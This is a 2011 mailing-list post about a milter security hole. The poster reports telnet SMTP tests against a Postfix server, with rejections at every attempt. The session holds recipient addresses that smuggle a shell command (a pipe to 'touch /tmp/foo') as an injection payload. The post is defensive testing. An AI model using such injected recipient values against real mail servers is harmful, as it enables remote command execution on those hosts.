* Mark Martinec <mark.martinec...@ijs.si>: > On Thursday February 10 2011 21:14:59 Adam Katz wrote: > > Does this affect sendmail as well as postfix? I assume so, > > but wanted an explicit confirmation. > > Yes, the security hole is entirely within the milter, > independent of the MTA.
I tried the exploit and it seems that Postfix' restrictions that check for FQDN address and correct recipient syntax prevent the exploit from getting through: telnet mail.example.de 25 220 mail.example.de ESMTP Postfix HELO foo 250 mail.example.de MAIL FROM:<> 250 2.1.0 Ok RCPT TO:root+:"|touch /tmp/foo" 501 5.1.3 Bad recipient address syntax RCPT TO:<root+:"|touch /tmp/foo"> 504 5.5.2 <root+:|touch /tmp/foo>: Recipient address rejected: need fully-qualified address RCPT TO:<root@localhost+:"|touch /tmp/foo"> 501 5.1.3 Bad recipient address syntax QUIT 221 2.0.0 Bye Can anyone confirm this? p@rick -- state of mind Digitale Kommunikation http://www.state-of-mind.de Franziskanerstraße 15 Telefon +49 89 3090 4664 81669 München Telefax +49 89 3090 4666 Amtsgericht München Partnerschaftsregister PR 563
